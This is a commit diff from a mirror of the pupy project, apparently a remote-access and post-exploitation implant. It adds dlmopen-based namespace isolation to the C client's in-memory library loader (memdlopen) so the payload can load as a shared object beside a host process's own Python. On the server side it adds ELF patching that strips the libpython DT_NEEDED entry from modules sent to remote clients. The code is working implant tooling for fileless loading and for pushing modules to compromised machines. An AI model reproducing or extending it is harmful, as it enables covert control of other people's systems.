mirror of https://github.com/n1nj4sec/pupy.git
linux/client: Add LMID support
Do not load python into the global (RTLD_GLOBAL) namespace. This allows the
shared object to be loaded alongside other copies of python. Example:

    > python3
    Python 3.6.5 (default, Jun 30 2018, 10:35:51)
    [GCC 7.3.0] on linux
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import ctypes; ctypes.CDLL('/tmp/ppd.so')

This requires the latest tc-linux32/tc-linux64 toolchains.
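Below is a minimal sketch (not part of this commit) of the loading scheme the
message describes: dlmopen() with LM_ID_NEWLM places a library in its own
link-map namespace, and dlinfo() returns the namespace id so later loads can
join it. It assumes glibc's <dlfcn.h>; /tmp/ppd.so is just the placeholder
path from the example above.

    /* build: gcc -D_GNU_SOURCE sketch.c -ldl */
    #include <dlfcn.h>
    #include <stdio.h>

    int main(void) {
        /* LM_ID_NEWLM asks the loader to create a fresh namespace */
        Lmid_t lmid = LM_ID_NEWLM;

        /* keep the load RTLD_LOCAL; the commit masks out RTLD_GLOBAL the same way */
        void *handle = dlmopen(lmid, "/tmp/ppd.so", RTLD_NOW | RTLD_LOCAL);
        if (!handle) {
            fprintf(stderr, "dlmopen: %s\n", dlerror());
            return 1;
        }

        /* remember which namespace was created so later objects can join it */
        if (dlinfo(handle, RTLD_DI_LMID, &lmid) == 0)
            printf("loaded into namespace %ld\n", (long) lmid);

        dlclose(handle);
        return 0;
    }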
parent 691b52e8c7
commit 6fd57e4503
@@ -348,6 +348,24 @@ pid_t memexec(const char *buffer, size_t size, const char* const* argv, int stdi
     return -1;
 }

+#ifdef LM_ID_NEWLM
+static void *_dlopen(const char *path, int flags) {
+    static Lmid_t lmid = LM_ID_NEWLM;
+
+    flags &= ~RTLD_GLOBAL;
+
+    void *handle = dlmopen(lmid, path, flags);
+    if (lmid == LM_ID_NEWLM && handle) {
+        dlinfo(handle, RTLD_DI_LMID, &lmid);
+        dprint("memdlopen - dlmopen - new lmid created: %08x\n", lmid);
+    }
+
+    return handle;
+}
+#else
+#define _dlopen(path, flags) dlopen(path, flags)
+#endif
+
 void *memdlopen(const char *soname, const char *buffer, size_t size) {
     dprint("memdlopen(\"%s\", %p, %ull)\n", soname, buffer, size);

@@ -366,7 +384,7 @@ void *memdlopen(const char *soname, const char *buffer, size_t size) {
         return search.base;
     }

-    void *base = dlopen(soname, RTLD_NOLOAD);
+    void *base = _dlopen(soname, RTLD_NOLOAD);
     if (base) {
         dprint("Library \"%s\" loaded from OS\n", soname);
         return base;

@@ -415,7 +433,11 @@ void *memdlopen(const char *soname, const char *buffer, size_t size) {
     bool is_memfd = false;
 #endif

-    base = dlopen(buf, RTLD_NOW | RTLD_GLOBAL);
+    int flags = RTLD_NOW | RTLD_LOCAL;
+
+    dprint("dlopen(%s, %08x)\n", buf, flags);
+    base = _dlopen(buf, flags);
+    dprint("dlopen(%s, %08x) = %p\n", buf, flags, base);
     if (!is_memfd) {
         dprint("Close fd: %d\n", fd);
         close(fd);
@@ -1 +1 @@
-Subproject commit 218abc23b1231bba33fe272ffc1e5dbc5317078f
+Subproject commit 3bded1c0f194c957684d887582f901991597c21d
@@ -57,7 +57,9 @@ class PupyClient(object):
         }

         #alias
-        self.conn = self.desc["conn"]
+        self.conn = self.desc['conn']
+        self.native = self.desc['native']
+
         self.pupsrv = pupsrv
         self.imported_dlls = set()
         self.imported_modules = set()

@@ -338,7 +340,7 @@ class PupyClient(object):
         if name in self.imported_dlls:
             return False

-        buf = dependencies.dll(name, self.platform, self.arch)
+        buf = dependencies.dll(name, self.platform, self.arch, native=self.native)
         if not buf:
             raise ImportError('Shared object {} not found'.format(name))

@@ -455,7 +457,7 @@ class PupyClient(object):
             posix=self.is_posix(), honor_ignore=honor_ignore,
             filter_needed_cb=lambda modules, dll: self.filter_new_modules(
                 modules, dll, forced, remote
-            )
+            ), native=self.native
         )

         self.cached_modules.update(contents)

@@ -509,17 +511,17 @@ class PupyClient(object):
         self.remote_invalidate_module(module_name)

     def remote_load_package(self, module_name):
-        logger.debug('remote_load_package for %s started', module_name)
+        logger.info('remote_load_package for %s started', module_name)

         try:
            return self.load_package(module_name, remote=True)

         except dependencies.NotFoundError:
-            logger.debug('remote_load_package for %s failed', module_name)
+            logger.info('remote_load_package for %s failed', module_name)
             return None, None

         finally:
-            logger.debug('remote_load_package for %s completed', module_name)
+            logger.info('remote_load_package for %s completed', module_name)

     def remote_print_error(self, msg):
         self.pupsrv.handler.display_warning(msg)
@@ -7,6 +7,9 @@ import cPickle
 import zlib
 from zipfile import ZipFile

+from elftools.elf.elffile import ELFFile
+from io import BytesIO
+
 from pupylib.PupyCompile import pupycompile
 from pupylib import ROOT, getLogger

@@ -119,6 +122,41 @@ WELL_KNOWN_DEPS = {

 logger.debug("LIBS_AUTHORIZED_PATHS=%s"%repr(LIBS_AUTHORIZED_PATHS))

+def remove_dt_needed(data, libname):
+    ef = ELFFile(data)
+    dyn = ef.get_section_by_name('.dynamic')
+
+    ent_size = dyn.header.sh_entsize
+    sect_size = dyn.header.sh_size
+    sect_offt = dyn.header.sh_offset
+
+    tag_idx = None
+
+    for idx in xrange(sect_size/ent_size):
+        tag = dyn.get_tag(idx)
+        if tag['d_tag'] == 'DT_NEEDED':
+            if tag.needed == libname:
+                tag_idx = idx
+                break
+
+    if tag_idx is None:
+        return False
+
+    null_tag = '\x00' * ent_size
+    dynamic_tail = None
+
+    if idx == 0:
+        dynamic_tail = dyn.data()[ent_size:] + null_tag
+    else:
+        dyndata = dyn.data()
+        dynamic_tail = dyndata[:ent_size*(idx)] + \
+            dyndata[ent_size*(idx+1):] + null_tag
+
+    data.seek(sect_offt)
+    data.write(dynamic_tail)
+    return True
+
+
 def safe_file_exists(f):
     """ some file systems like vmhgfs are case insensitive and os.isdir() return True for "lAzAgNE", so we need this check for modules like LaZagne.py and lazagne gets well imported """
     return os.path.basename(f) in os.listdir(os.path.dirname(f))

@@ -137,7 +175,7 @@ sys.modules[fullname]=mod

     return code

-def importer(dependencies, os='all', arch=None, path=None, posix=None):
+def importer(dependencies, os='all', arch=None, path=None, posix=None, native=False):
     if path:
         modules = {}
         if not type(dependencies) in (list, tuple, set, frozenset):
@@ -149,11 +187,22 @@ def importer(dependencies, os='all', arch=None, path=None, posix=None)
             blob = cPickle.dumps(modules)
             blob = zlib.compress(blob, 9)
     else:
-        blob, modules, _ = package(dependencies, os, arch, posix=posix)
+        blob, modules, _ = package(dependencies, os, arch, posix=posix, native=native)

     return 'pupyimporter.pupy_add_package({}, compressed=True)'.format(repr(blob))

-def get_content(platform, arch, prefix, filepath, archive=None, honor_ignore=True):
+def modify_native_content(filename, content):
+    if content.startswith('\x7fELF'):
+        logger.info('ELF file - %s, check for libpython DT_NEED record', filename)
+        image = BytesIO(content)
+        if remove_dt_needed(image, 'libpython2.7.so.1.0'):
+            logger.info('Modified: DT_NEEDED libpython2.7.so.1.0 removed')
+
+        content = image.getvalue()
+
+    return content
+
+def get_content(platform, arch, prefix, filepath, archive=None, honor_ignore=True, native=False):
     if filepath.startswith(prefix) and honor_ignore:
         basepath = filepath[len(prefix)+1:]
         basepath, ext = os.path.splitext(basepath)

@@ -199,13 +248,23 @@ def get_content(platform, arch, prefix, filepath, archive=None, honor_ignore=Tru
                 logger.info('Patch: Ignore %s (%s)', filepath, ignore)
                 raise IgnoreFileException()

+    content = None
+
     if archive:
-        return archive.read(filepath)
+        content = archive.read(filepath)
     else:
         with open(filepath, 'rb') as filedata:
-            return filedata.read()
+            content = filedata.read()

+    if not native:
+        logger.debug('Modify natve content for %s (native=%s)', filepath, bool(native))
+        content = modify_native_content(filepath, content)
+
+    return content
+
-def from_path(platform, arch, search_path, start_path, pure_python_only=False, remote=False, honor_ignore=True):
+def from_path(platform, arch, search_path, start_path, pure_python_only=False,
+              remote=False, honor_ignore=True, native=False):
+
     query = start_path

     modules_dic = {}

@@ -243,7 +302,8 @@ def from_path(platform, arch, search_path, start_path, pure_python_only=False, r
                         arch,
                         search_path,
                         os.path.join(root, f),
-                        honor_ignore=honor_ignore)
+                        honor_ignore=honor_ignore,
+                        native=native)
                 except IgnoreFileException:
                     continue

@@ -300,7 +360,8 @@ def from_path(platform, arch, search_path, start_path, pure_python_only=False, r
                     arch,
                     search_path,
                     filepath,
-                    honor_ignore=honor_ignore)
+                    honor_ignore=honor_ignore,
+                    native=native)
             except IgnoreFileException:
                 break
@@ -363,18 +424,21 @@ def _dependencies(module_name, os, dependencies):
     dependencies.add(module_name)

     mod_deps = WELL_KNOWN_DEPS.get(module_name, {})

     for dependency in mod_deps.get('all', []) + mod_deps.get(os, []):
         _dependencies(dependency, os, dependencies)

-def _package(modules, module_name, platform, arch, remote=False, posix=None, honor_ignore=True):
+def _package(modules, module_name, platform, arch, remote=False, posix=None, honor_ignore=True, native=False):

     initial_module_name = module_name

     start_path = module_name.replace('.', os.path.sep)

     for search_path in paths(platform, arch, posix):
-        modules_dic = from_path(platform, arch, search_path, start_path,
-                                remote=remote, honor_ignore=honor_ignore)
+        modules_dic = from_path(
+            platform, arch, search_path, start_path,
+            remote=remote, honor_ignore=honor_ignore,
+            native=native)
         if modules_dic:
             break

@@ -399,6 +463,7 @@ def _package(modules, module_name, platform, arch, remote=False, posix=None, hon
             content = None
             if info.filename.startswith(start_paths):
                 module_name = info.filename
+
                 for prefix in COMMON_SEARCH_PREFIXES:
                     if module_name.startswith(prefix+'/'):
                         module_name = module_name[len(prefix)+1:]

@@ -416,7 +481,8 @@ def _package(modules, module_name, platform, arch, remote=False, posix=None, hon
                         get_content(
                             platform, arch, prefix,
                             info.filename, archive,
-                            honor_ignore=honor_ignore),
+                            honor_ignore=honor_ignore,
+                            native=native),
                         info.filename)
                 except IgnoreFileException:
                     continue

@@ -454,7 +520,8 @@ def _package(modules, module_name, platform, arch, remote=False, posix=None, hon
                     content = get_content(
                         platform, arch, prefix,
                         info.filename, archive,
-                        honor_ignore=honor_ignore)
+                        honor_ignore=honor_ignore,
+                        native=native)
                 except IgnoreFileException:
                     continue

@@ -488,7 +555,8 @@ def _package(modules, module_name, platform, arch, remote=False, posix=None, hon

     modules.update(modules_dic)

-def package(requirements, platform, arch, remote=False, posix=False, filter_needed_cb=None, honor_ignore=True):
+def package(requirements, platform, arch, remote=False, posix=False,
+            filter_needed_cb=None, honor_ignore=True, native=False):
     dependencies = set()

     if not type(requirements) in (list, tuple, set, frozenset):

@@ -524,7 +592,8 @@ def package(requirements, platform, arch, remote=False, posix=False, filter_need
         _package(
             modules, dependency, platform, arch,
             remote=remote, posix=posix,
-            honor_ignore=honor_ignore
+            honor_ignore=honor_ignore,
+            native=native
         )

     blob = zlib.compress(cPickle.dumps(modules), 9)

@@ -552,7 +621,7 @@ def bundle(platform, arch):

     return ZipFile(arch_bundle, 'r')

-def dll(name, platform, arch, honor_ignore=True):
+def dll(name, platform, arch, honor_ignore=True, native=False):
     buf = b''

     for packages_path in paths(platform, arch):

@@ -561,7 +630,7 @@ def dll(name, platform, arch, honor_ignore=True):
         try:
             buf = get_content(
                 platform, arch, name, packages_path, dll_path,
-                honor_ignore=honor_ignore)
+                honor_ignore=honor_ignore, native=native)
         except IgnoreFileException:
             pass

@@ -577,7 +646,8 @@ def dll(name, platform, arch, honor_ignore=True):
                     platform, arch, os.path.dirname(info.filename),
                     info.filename,
                     archive,
-                    honor_ignore=honor_ignore
+                    honor_ignore=honor_ignore,
+                    native=native
                 )
             except IgnoreFileException:
                 pass
@@ -35,6 +35,7 @@ fusepy
 defusedxml
 keyboard
 puttykeys
+pyelftools
 -e external/pykcp
 flake8
 flake8-per-file-ignores